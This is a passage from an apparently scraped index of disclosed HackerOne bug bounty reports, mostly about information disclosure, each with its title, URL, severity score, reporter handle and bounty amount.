\nhttps://hackerone.com/reports/267922\n#### Severity score\nnull\n#### Reporter \nutkarsh1\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nРаскрытие полного серверного пути\n#### URL \nhttps://hackerone.com/reports/15802\n#### Severity score\nnull\n#### Reporter \nbigbear\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExtracting private info of estimates.\n#### URL \nhttps://hackerone.com/reports/160981\n#### Severity score\nnull\n#### Reporter \nbugdiscloseguys\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nInformation Disclosure on {http://pro.tracker.my.com}\n#### URL \nhttps://hackerone.com/reports/847276\n#### Severity score\n0\n#### Reporter \ndedsec69\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nRace condition in GitLab import, giving access to other people their imports due to filename collision\n#### URL \nhttps://hackerone.com/reports/214028\n#### Severity score\n3.7\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ninformation disclosure\n#### URL \nhttps://hackerone.com/reports/78765\n#### Severity score\nnull\n#### Reporter \nshekhar93\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nSession cookie missing SecureFlag on git.edoverflow.com.\n#### URL \nhttps://hackerone.com/reports/345166\n#### Severity score\nnull\n#### Reporter \ntangent90ninety\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull access at an internal service of Shopify\n#### URL \nhttps://hackerone.com/reports/216389\n#### Severity score\nnull\n#### Reporter \njamesclyde\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nControlled address leak due to type confusion - ASLR bypass\n#### URL \nhttps://hackerone.com/reports/207321\n#### Severity score\nnull\n#### Reporter \naerodudrizzt\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nError stack trace enabled\n#### URL \nhttps://hackerone.com/reports/74515\n#### Severity score\nnull\n#### Reporter \n4lemon\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nServing Transitions From: HTTP Protocol (not secure)\n#### URL \nhttps://hackerone.com/reports/14803\n#### Severity score\nnull\n#### Reporter \nkmh127001\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nprogram_analytics_benchmarks query shows information not visible in public\n#### URL \nhttps://hackerone.com/reports/826176\n#### Severity score\nnull\n#### Reporter \n0619\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSensitive server-side/application information disclosure\n#### URL \nhttps://hackerone.com/reports/78012\n#### Severity score\nnull\n#### Reporter \nsarwar_jahan_m\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of Users Information via Wordpress API (?rest_route)\n#### URL \nhttps://hackerone.com/reports/335341\n#### Severity score\nnull\n#### Reporter \nvictorrocha\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\n[Information Disclosure] Amazon S3 Bucket of Shopify Ping (iOS) have public access of other users image\n#### URL \nhttps://hackerone.com/reports/1021906\n#### Severity score\nnull\n#### Reporter \njustmek\n### Bounty paid\n$2,900\n\n\n---\n\n\n### Title\nInformation Disclosure\n#### URL \nhttps://hackerone.com/reports/221333\n#### Severity score\nnull\n#### Reporter \nsecure_world\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure \n#### URL \nhttps://hackerone.com/reports/87505\n#### Severity score\nnull\n#### Reporter \nishahriyar\n### Bounty paid\n$25\n\n\n---\n\n\n### Title\nWeb Server Disclosure\n#### URL \nhttps://hackerone.com/reports/149327\n#### Severity score\nnull\n#### Reporter \n12345678910\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure at https://blockchain.atlassian.net\n#### URL \nhttps://hackerone.com/reports/179599\n#### Severity score\nnull\n#### Reporter \nlewerkun\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nAndroid - Possible to intercept broadcasts about uploaded files\n#### URL \nhttps://hackerone.com/reports/167481\n#### Severity score\nnull\n#### Reporter \nbagipro\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nstop serving grtp.co over HTTP\n#### URL \nhttps://hackerone.com/reports/117330\n#### Severity score\nnull\n#### Reporter \nsecbughunter\n### Bounty paid\n$1\n\n\n---\n\n\n### Title\nContent-Injection/XSS ████\n#### URL \nhttps://hackerone.com/reports/205360\n#### Severity score\nnull\n#### Reporter \nc0rte\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWordPress username enumeration (/author)\n#### URL \nhttps://hackerone.com/reports/414427\n#### Severity score\nnull\n#### Reporter \nrootbakar___\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Exposure Through Directory Listing\n#### URL \nhttps://hackerone.com/reports/110655\n#### Severity score\nnull\n#### Reporter \nerlijnvangenuchten\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nSSRF allows access to internal services like Ganglia\n#### URL \nhttps://hackerone.com/reports/151086\n#### Severity score\nnull\n#### Reporter \nagarri_fr\n### Bounty paid\n$729\n\n\n---\n\n\n### Title\nblog.praca.olx.pl database credentials exposure\n#### URL \nhttps://hackerone.com/reports/448985\n#### Severity score\nnull\n#### Reporter \nhdbreaker\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDirectory listing\n#### URL \nhttps://hackerone.com/reports/193753\n#### Severity score\nnull\n#### Reporter \nc4pt4ink1dd\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure \n#### URL \nhttps://hackerone.com/reports/941335\n#### Severity score\nnull\n#### Reporter \nsteal_wart\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPublicly Accessible Datadog link\n#### URL \nhttps://hackerone.com/reports/345152\n#### Severity score\n0\n#### Reporter \nrijalrojan\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nUsername and sim id enum\n#### URL \nhttps://hackerone.com/reports/47358\n#### Severity score\nnull\n#### Reporter \n4lemon\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOrderListInitial leaks order details\n#### URL \nhttps://hackerone.com/reports/882412\n#### Severity score\n5\n#### Reporter \nsreeju_kc\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nObtain the username & the uid of the one doing the S3 sync on Hackerone\n#### URL \nhttps://hackerone.com/reports/173175\n#### Severity score\nnull\n#### Reporter \nrbcafe\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nРаскрытие IP, почты и другой полезной информации lootdog.io\n#### URL \nhttps://hackerone.com/reports/355948\n#### Severity score\n3.4\n#### Reporter \ncircuit\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nInformation disclosure of website\n#### URL \nhttps://hackerone.com/reports/179121\n#### Severity score\nnull\n#### Reporter \n1_1_1\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure when /invitations/.json is not yet accepted\n#### URL \nhttps://hackerone.com/reports/290930\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser Information Disclosure via REST API\n#### URL \nhttps://hackerone.com/reports/197786\n#### Severity score\nnull\n#### Reporter \nalykode\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nRegistration enabled on ███grab.com\n#### URL \nhttps://hackerone.com/reports/318099\n#### Severity score\nnull\n#### Reporter \ngrouptherapy\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nThe session token in the URL\n#### URL \nhttps://hackerone.com/reports/341372\n#### Severity score\nnull\n#### Reporter \nmandark\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAdmin Reseller Account Disclosure\n#### URL \nhttps://hackerone.com/reports/879562\n#### Severity score\nnull\n#### Reporter \nstilou\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOption method enabled (viestinta.lahitapiola.fi)\n#### URL \nhttps://hackerone.com/reports/182265\n#### Severity score\nnull\n#### Reporter \n1_1_1\n### Bounty paid\n$60\n\n\n---\n\n\n### Title\nSECRET_KEY Of Django Leaked In maps.me\n#### URL \nhttps://hackerone.com/reports/949686\n#### Severity score\n6.1\n#### Reporter \nsniper302\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nAngular Expression Injection in the my.gmc.com Search Page\n#### URL \nhttps://hackerone.com/reports/124578\n#### Severity score\nnull\n#### Reporter \nsignalchaos\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nApi token exposed in Reverb.com's public github repository\n#### URL \nhttps://hackerone.com/reports/352623\n#### Severity score\nnull\n#### Reporter \nalbatraoz\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nInformation disclosure through directory listing at http://dockerhost01.maximum.nl:8080\n#### URL \nhttps://hackerone.com/reports/150905\n#### Severity score\nnull\n#### Reporter \nlewerkun\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nUnauthorized users may be able to view almost all informations related to Private projects.\n#### URL \nhttps://hackerone.com/reports/407763\n#### Severity score\n4.6\n#### Reporter \n8ayac\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nnextcloud.com: Directory listening for 'wp-includes' forders\n#### URL \nhttps://hackerone.com/reports/145495\n#### Severity score\nnull\n#### Reporter \nzuh4n\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nStealing Arbitrary Private Files of MyMail App \n#### URL \nhttps://hackerone.com/reports/365280\n#### Severity score\n6.5\n#### Reporter \nheeeeen\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nImages and Subtitles Leakage from private videos\n#### URL \nhttps://hackerone.com/reports/136850\n#### Severity score\nnull\n#### Reporter \nopnsec\n### Bounty paid\n$125\n\n\n---\n\n\n### Title\nРасшифровка всех типов шифрованных ID\n#### URL \nhttps://hackerone.com/reports/402410\n#### Severity score\nnull\n#### Reporter \njarvis7\n### Bounty paid\n$320\n\n\n---\n\n\n### Title\nПросмотр приватных видео записей у Пользователей\n#### URL \nhttps://hackerone.com/reports/317985\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nPossible to Upload Local Arbitrary Private File to the Cloud against User's Will\n#### URL \nhttps://hackerone.com/reports/384472\n#### Severity score\n2.5\n#### Reporter \nheeeeen\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nError stack trace\n#### URL \nhttps://hackerone.com/reports/46366\n#### Severity score\nnull\n#### Reporter \n4lemon\n### Bounty paid\n$10\n\n\n---\n\n\n### Title\nGet ip and Geo location any user via Clickjacking with inspectlet technology\n#### URL \nhttps://hackerone.com/reports/998555\n#### Severity score\nnull\n#### Reporter \nabosala7\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nReputation gain split by company can be used to track the existence of otherwise undisclosed reports\n#### URL \nhttps://hackerone.com/reports/311449\n#### Severity score\nnull\n#### Reporter \naidantwoods\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nEXIF metadata not stripped from JPG group logos\n#### URL \nhttps://hackerone.com/reports/446238\n#### Severity score\nnull\n#### Reporter \njackb898\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\n[lootdog.io] User phone number disclosure\n#### URL \nhttps://hackerone.com/reports/470010\n#### Severity score\n0\n#### Reporter \ntheappsec\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\ndon't serve hidden files from Nginx\n#### URL \nhttps://hackerone.com/reports/120026\n#### Severity score\nnull\n#### Reporter \njsshen\n### Bounty paid\n$1\n\n\n---\n\n\n### Title\nImageMagick GIF coder vulnerability leading to memory disclosure\n#### URL \nhttps://hackerone.com/reports/302885\n#### Severity score\n3.8\n#### Reporter \nkunal94\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nNumerous open ports/services\n#### URL \nhttps://hackerone.com/reports/8064\n#### Severity score\nnull\n#### Reporter \nrajuraju14\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTeam object in GraphQL discloses team group names and permissions\n#### URL \nhttps://hackerone.com/reports/343464\n#### Severity score\n5\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nIDOR - Downloading all attachements if having access to a shared link\n#### URL \nhttps://hackerone.com/reports/194790\n#### Severity score\nnull\n#### Reporter \ninhibitor181\n### Bounty paid\n$888\n\n\n---\n\n\n### Title\nVersion Disclosure (NginX)\n#### URL \nhttps://hackerone.com/reports/23447\n#### Severity score\nnull\n#### Reporter \nstalker\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ndon't allow directory browsing on grtp.co\n#### URL \nhttps://hackerone.com/reports/151295\n#### Severity score\nnull\n#### Reporter \nzuh4n\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPartial disclosure of report activity through new \"Export as .zip\" feature\n#### URL \nhttps://hackerone.com/reports/182358\n#### Severity score\n7.5\n#### Reporter \nfaisalahmed\n### Bounty paid\n$10,000\n\n\n---\n\n\n### Title\n[sso.33slona.ru] Application Messages Error stacktrace PHP.\n#### URL \nhttps://hackerone.com/reports/666065\n#### Severity score\nnull\n#### Reporter \niframe\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nKaspersky Password Manager allows websites to access user's address data\n#### URL \nhttps://hackerone.com/reports/430854\n#### Severity score\nnull\n#### Reporter \npalant\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nFull path + some back-end code disclosure\n#### URL \nhttps://hackerone.com/reports/149212\n#### Severity score\nnull\n#### Reporter \nstrukt\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSensitive Information Disclosure\n#### URL \nhttps://hackerone.com/reports/963352\n#### Severity score\nnull\n#### Reporter \nexploit_db\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLahitapiola´s customer names send to 3rd party\n#### URL \nhttps://hackerone.com/reports/177523\n#### Severity score\nnull\n#### Reporter \nbilly_blaze\n### Bounty paid\n$588\n\n\n---\n\n\n### Title\npage_controls_menu_js can reveal collection version of page\n#### URL \nhttps://hackerone.com/reports/4938\n#### Severity score\nnull\n#### Reporter \nmnkras\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAbility to collect users' ids that have visited a specific web page with malicious code \n#### URL \nhttps://hackerone.com/reports/139192\n#### Severity score\nnull\n#### Reporter \nsaeedhashem\n### Bounty paid\n$280\n\n\n---\n\n\n### Title\nBasic auth details is still work on report ( 351555 ) \n#### URL \nhttps://hackerone.com/reports/367581\n#### Severity score\nnull\n#### Reporter \nm7mdharoun\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nLighttpd version disclosure / directory listing\n#### URL \nhttps://hackerone.com/reports/6371\n#### Severity score\nnull\n#### Reporter \ninternetwache\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPII leakage due to caching of Order/Contract ID's on █████████\n#### URL \nhttps://hackerone.com/reports/374007\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBase alpha version code exposure\n#### URL \nhttps://hackerone.com/reports/167859\n#### Severity score\nnull\n#### Reporter \ncha5m\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nLinux TBB SFTP URI allows local IP disclosure\n#### URL \nhttps://hackerone.com/reports/253429\n#### Severity score\nnull\n#### Reporter \njulianjackson\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nDifferential \"Show Raw File\" feature exposes generated files to unauthorised users\n#### URL \nhttps://hackerone.com/reports/213942\n#### Severity score\n4.8\n#### Reporter \ncalvium\n### Bounty paid\n$600\n\n\n---\n\n\n### Title\nExploiting Misconfigured CORS to Steal User Information\n#### URL \nhttps://hackerone.com/reports/317391\n#### Severity score\nnull\n#### Reporter \n1hack0\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nApache server-info enabled\n#### URL \nhttps://hackerone.com/reports/424882\n#### Severity score\n0\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[mobs.mail.ru] nginx path traversal via misconfigured alias\n#### URL \nhttps://hackerone.com/reports/312510\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWeb Server information disclosure.\n#### URL \nhttps://hackerone.com/reports/42780\n#### Severity score\nnull\n#### Reporter \nxavinux\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nОпределение id по номеру телефона\n#### URL \nhttps://hackerone.com/reports/331040\n#### Severity score\nnull\n#### Reporter \narhimason\n### Bounty paid\n$5,000\n\n\n---\n\n\n### Title\n[sms-be-vip.twitter.com] vulnerable to Jetleak\n#### URL \nhttps://hackerone.com/reports/143935\n#### Severity score\nnull\n#### Reporter \nmolejarka\n### Bounty paid\n$1,260\n\n\n---\n\n\n### Title\ninformation disclose \n#### URL \nhttps://hackerone.com/reports/135782\n#### Severity score\nnull\n#### Reporter \ndotnick\n### Bounty paid\n$25\n\n\n---\n\n\n### Title\nSSRF vulnerablity in app webhooks\n#### URL \nhttps://hackerone.com/reports/56828\n#### Severity score\nnull\n#### Reporter \nhaquaman\n### Bounty paid\n$512\n\n\n---\n\n\n### Title\nUnauthenticated LFI revealing log information\n#### URL \nhttps://hackerone.com/reports/272578\n#### Severity score\nnull\n#### Reporter \njuji\n### Bounty paid\n$4,000\n\n\n---\n\n\n### Title\nDisclosure of ip addresses in local network of uber\n#### URL \nhttps://hackerone.com/reports/126569\n#### Severity score\nnull\n#### Reporter \nlaps-forever\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nserver calendar and server status available to public\n#### URL \nhttps://hackerone.com/reports/116621\n#### Severity score\nnull\n#### Reporter \nbulla\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure PHPpgAdmin\n#### URL \nhttps://hackerone.com/reports/463177\n#### Severity score\nnull\n#### Reporter \nmazmur\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nserver version dislosure\n#### URL \nhttps://hackerone.com/reports/179217\n#### Severity score\nnull\n#### Reporter \ngoodman97\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nInsecure Direct 'org-invite-log' References\n#### URL \nhttps://hackerone.com/reports/123712\n#### Severity score\nnull\n#### Reporter \nzuh4n\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nF5 BIG-IP Cookie Remote Information Disclosure\n#### URL \nhttps://hackerone.com/reports/330716\n#### Severity score\nnull\n#### Reporter \npetruknisme\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nEmail information leakage for certain addresses\n#### URL \nhttps://hackerone.com/reports/169992\n#### Severity score\nnull\n#### Reporter \nprocode701\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nDe-anonymization by visiting specially crafted bookmark.\n#### URL \nhttps://hackerone.com/reports/294364\n#### Severity score\nnull\n#### Reporter \nqab\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHTTP status code manipluation & java stack trace \n#### URL \nhttps://hackerone.com/reports/135192\n#### Severity score\nnull\n#### Reporter \nras-it\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nUnauthorized user can obtain `report_sources` attribute through Team GraphQL object\n#### URL \nhttps://hackerone.com/reports/770209\n#### Severity score\n5\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nLeaking license key in source code\n#### URL \nhttps://hackerone.com/reports/154855\n#### Severity score\nnull\n#### Reporter \npradeepch99\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNumber, username and name disclosure\n#### URL \nhttps://hackerone.com/reports/45243\n#### Severity score\nnull\n#### Reporter \n4lemon\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFirewall rules for ████████ can be bypassed to leak site authors\n#### URL \nhttps://hackerone.com/reports/743643\n#### Severity score\nnull\n#### Reporter \nnrockhouse\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGit repository found\n#### URL \nhttps://hackerone.com/reports/248693\n#### Severity score\n7.5\n#### Reporter \nlinkks\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nConnect-only connections can use the wrong connection\n#### URL \nhttps://hackerone.com/reports/948876\n#### Severity score\nnull\n#### Reporter \nm42a\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nInformation disclosure on https://paycard.rapida.ru\n#### URL \nhttps://hackerone.com/reports/299552\n#### Severity score\nnull\n#### Reporter \ntikoo_sahil\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nSSRF vulnerability (access to metadata server on EC2 and OpenStack)\n#### URL \nhttps://hackerone.com/reports/53088\n#### Severity score\nnull\n#### Reporter \nagarri_fr\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nGithub information leaked\n#### URL \nhttps://hackerone.com/reports/676212\n#### Severity score\nnull\n#### Reporter \nfarmsec_alice\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nLeaking of password reset token through referer\n#### URL \nhttps://hackerone.com/reports/13557\n#### Severity score\nnull\n#### Reporter \nrobin\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWatch any Password Video without password\n#### URL \nhttps://hackerone.com/reports/155618\n#### Severity score\nnull\n#### Reporter \nopnsec\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nUser Information sent to client through websockets\n#### URL \nhttps://hackerone.com/reports/163464\n#### Severity score\nnull\n#### Reporter \ncablej\n### Bounty paid\n$120\n\n\n---\n\n\n### Title\nApache Server Version Disclousure\n#### URL \nhttps://hackerone.com/reports/406388\n#### Severity score\nnull\n#### Reporter \nmazmur\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ndashboard/pages/types [Unknown column 'Array' in 'where clause'] disclosure.\n#### URL \nhttps://hackerone.com/reports/4811\n#### Severity score\nnull\n#### Reporter \nsmiegles\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser Information Disclosure via REST API\n#### URL \nhttps://hackerone.com/reports/197877\n#### Severity score\nnull\n#### Reporter \nxploitt\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[gratipay.com] Cross Site Tracing\n#### URL \nhttps://hackerone.com/reports/152834\n#### Severity score\nnull\n#### Reporter \nahsan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFile Name Enumeration \n#### URL \nhttps://hackerone.com/reports/33935\n#### Severity score\nnull\n#### Reporter \nnahamsec\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSecurity.allowDomain(\"*\") in SWFs on img.autos.yahoo.com allows data theft from Yahoo Mail (and others)\n#### URL \nhttps://hackerone.com/reports/1171\n#### Severity score\nnull\n#### Reporter \njordanmilne\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nPrivate account causes displayed through API\n#### URL \nhttps://hackerone.com/reports/826005\n#### Severity score\nnull\n#### Reporter \nech0bh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclousure on https://airship.paragonie.com\n#### URL \nhttps://hackerone.com/reports/226514\n#### Severity score\nnull\n#### Reporter \nruisilva\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDistinguish EP+Private vs Private programs in HackerOne\n#### URL \nhttps://hackerone.com/reports/118965\n#### Severity score\nnull\n#### Reporter \nnismo\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPII disclosure -- Past team members & their email ID(personal email) can be viewed by Staff member with no permissions on Partner Dashboard\n#### URL \nhttps://hackerone.com/reports/415622\n#### Severity score\nnull\n#### Reporter \nh13-\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSee details of a unpublished word by guessing the word ID\n#### URL \nhttps://hackerone.com/reports/311380\n#### Severity score\nnull\n#### Reporter \ntyagiji\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImageMagick GIF coder vulnerability leading to memory disclosure\n#### URL \nhttps://hackerone.com/reports/315256\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nSSH Port Wide Open\n#### URL \nhttps://hackerone.com/reports/11951\n#### Severity score\nnull\n#### Reporter \nrajuraju14\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOutdated Jenkins server hosted at OwnCloud.org\n#### URL \nhttps://hackerone.com/reports/208566\n#### Severity score\nnull\n#### Reporter \ncomputer-engineer\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInsecure Direct 'org-visitor-log' References\n#### URL \nhttps://hackerone.com/reports/123713\n#### Severity score\nnull\n#### Reporter \nzuh4n\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nlocalStorage не чистится после выхода\n#### URL \nhttps://hackerone.com/reports/8846\n#### Severity score\nnull\n#### Reporter \nkamil_hism\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nSensitive Information Disclosure on https://nordvpn.com/\n#### URL \nhttps://hackerone.com/reports/801197\n#### Severity score\nnull\n#### Reporter \n01alsanosi\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInternal attachments can be exported via \"Export as .zip\" feature\n#### URL \nhttps://hackerone.com/reports/186230\n#### Severity score\n7.5\n#### Reporter \njapz\n### Bounty paid\n$12,500\n\n\n---\n\n\n### Title\nLeaked DB credentials on https://██████████.mil/███\n#### URL \nhttps://hackerone.com/reports/761790\n#### Severity score\nnull\n#### Reporter \nal-madjus\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSSRF and local file disclosure in https://wordpress.com/media/videos/ via FFmpeg HLS processing\n#### URL \nhttps://hackerone.com/reports/237381\n#### Severity score\nnull\n#### Reporter \nneex\n### Bounty paid\n$800\n\n\n---\n\n\n### Title\nЧасть админки доступна для всех пользователей\n#### URL \nhttps://hackerone.com/reports/341637\n#### Severity score\nnull\n#### Reporter \ntrainzment\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nRelateIQ GWT based application visible to unauthenticated users\n#### URL \nhttps://hackerone.com/reports/3432\n#### Severity score\nnull\n#### Reporter \nanshuman_bh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure / Info Disclosure in Importing XML Section!\n#### URL \nhttps://hackerone.com/reports/8091\n#### Severity score\nnull\n#### Reporter \nfaisalahmed\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nName, email, phone and more disclosure on user ID (API)\n#### URL \nhttps://hackerone.com/reports/171917\n#### Severity score\nnull\n#### Reporter \nurl\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nПеречисление каталогов за счёт уязвимости в IIS\n#### URL \nhttps://hackerone.com/reports/15652\n#### Severity score\nnull\n#### Reporter \nbigbear\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGitHub API Key for BrewTestBot is publicly exposed\n#### URL \nhttps://hackerone.com/reports/388740\n#### Severity score\nnull\n#### Reporter \nejholmes\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNickname disclosure through web-chat\n#### URL \nhttps://hackerone.com/reports/569350\n#### Severity score\nnull\n#### Reporter \ncircuit\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nAttacker can access graphic representation of every query\n#### URL \nhttps://hackerone.com/reports/149914\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nleaking Digits OAuth authorization to third party websites\n#### URL \nhttps://hackerone.com/reports/166942\n#### Severity score\nnull\n#### Reporter \nakhil-reni\n### Bounty paid\n$560\n\n\n---\n\n\n### Title\n[special.mail.ru] Information Disclosure\n#### URL \nhttps://hackerone.com/reports/520883\n#### Severity score\n5.3\n#### Reporter \nbobrov\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nAttacker can claim credentials for private program that has a published external program\n#### URL \nhttps://hackerone.com/reports/449680\n#### Severity score\n6.4\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure Microsoft IIS Server service.cnf in a mtn website\n#### URL \nhttps://hackerone.com/reports/767066\n#### Severity score\nnull\n#### Reporter \nmiguel_santareno\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/196482\n#### Severity score\nnull\n#### Reporter \njoshualaurencio\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ndirectory information disclose\n#### URL \nhttps://hackerone.com/reports/226212\n#### Severity score\nnull\n#### Reporter \ntest_this\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[Quora Android] Possible to steal arbitrary files from mobile device\n#### URL \nhttps://hackerone.com/reports/258460\n#### Severity score\nnull\n#### Reporter \nbagipro\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\n information disclosure which leak the apache version \n#### URL \nhttps://hackerone.com/reports/460530\n#### Severity score\nnull\n#### Reporter \nhamzamn2098\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull path disclosure\n#### URL \nhttps://hackerone.com/reports/143575\n#### Severity score\nnull\n#### Reporter \nfnqgpc\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nThe \"Download Raw Diff\" URL is viewable by everyone\n#### URL \nhttps://hackerone.com/reports/356408\n#### Severity score\nnull\n#### Reporter \nxiaoyinl\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMissing Rate Limiting on https://twitter.com/account/complete\n#### URL \nhttps://hackerone.com/reports/27166\n#### Severity score\nnull\n#### Reporter \nsurgent10cross\n### Bounty paid\n$140\n\n\n---\n\n\n### Title\nNgnix Server version disclosure 404 Page!\n#### URL \nhttps://hackerone.com/reports/167036\n#### Severity score\nnull\n#### Reporter \nkhizer47\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInline banner on Report page discloses whether organization runs a private program\n#### URL \nhttps://hackerone.com/reports/452973\n#### Severity score\n3.1\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPassword authentication at newsletter.nextcloud.com discloses username list\n#### URL \nhttps://hackerone.com/reports/476439\n#### Severity score\nnull\n#### Reporter \nth3last1\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDiscloser of Internal Ip address\n#### URL \nhttps://hackerone.com/reports/518942\n#### Severity score\nnull\n#### Reporter \nghostin\n### Bounty paid\nnull\n\n\n---\n\n\n### 